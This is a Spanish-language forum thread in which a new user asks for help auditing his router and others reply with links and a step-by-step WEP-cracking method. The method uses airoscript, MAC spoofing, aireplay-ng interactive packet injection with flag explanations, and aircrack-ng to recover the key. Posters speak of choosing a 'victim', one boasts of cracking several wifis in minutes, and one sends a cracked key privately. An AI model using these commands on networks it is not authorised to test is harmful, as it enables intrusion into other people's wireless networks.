Hola a tod@s!!!
Soy nuevo en este foro, y practicamente en este mundo..
Uso wifiway para realizar mi propia auditoria de mi router. antes era de timofonica, con un wlan_XX y me resultaba superfacilismo... ahora ya me cambiado a yacom.. tengo router wlanXXXXX y no tengo manera de sacar la auditoria..alguien puede ayudarme???lo agradeceria muxo...saludos y gracias de antemano
Hola vsx187 si se nota q eres nuevo por q creo q este post no va en este foro, esto va en el foro de wireles asi q la proxima postealo alla para poder ayudarte...
saludos...
hola,
esta claro que con wlandwcrypter, si es lo que esta usando no lo conseguiras, pero por linea de comandos no es muy dificil, ¿cuales son los pasos que sigues?
un saludo
Si quieres aprender...
http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html
Tambien..
http://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html
Saludos
Interesante.
Yo mañana probaré el método de heaviloto y os comento.
Cita de: heaviloto en 27 Diciembre 2008, 23:13 PM
hola, acabo de sacar otra WLAN_XXXXXX, sin cliente me e asociado y e atacado con
-. aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ( bssid del AP) -h (nuestra bssid o conectada ) wlan0
y hala a capturar ARP, luego con,
-. aircrack (nombre inventado del archivo)-01.cap
y ya esta, key found
un saludo
PD: dudux, te la mando por privado
Bueno, ya he probado el método que comenta heaviloto, y la verdad es que he crackeado wifis que no podia crakear durante horas y horas en 5 minutos.
EXITAZO !!!
Simplemente (con Wifiway) tenéis que ejecutar airoscript, escanear, seleccionar victima, ataque modo 1 (interactivo), y luego en una consola aparte, luego de haberle puesto una MAC fake a vuestra wifi, ponéis esto:
Citaraireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ( bssid del AP) -h (nuestra bssid o conectada ) wlan0
aireplay-ng -F -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b MAC_del_punto_de_acceso_(BSSID) -h MAC_de_tu_tarjeta_ wireless -x ratio_inyección <dispositivo_monitor>
-f fromds : frame control, From DS bit
-2 Ataque 2: Selección interactiva del paquete a enviar
-p 0841 fija el "Frame Control" para que parezca que el paquete se está enviando desde un cliente wireless.
-c dmac : fijar dirección MAC de destino en este caso Broadcast (http://es.wikipedia.org/wiki/Broadcast_%28inform%C3%A1tica%29)
-b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso (BSSID). Este es un filtro para seleccionar un AP.
-h smac : fijar dirección MAC origen, es la dirección MAC de los paquetes que se están transmitiendo, que debe coincidir con la MAC de tu tarjeta wireless.
-x nbpps : número de paquetes por segundo
<dispositivo_monitor> : Nombre de la interface wireless.
http://www.aircrack-ng.org/doku.php?id=es:interactive_packet_replay
http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay
Salu2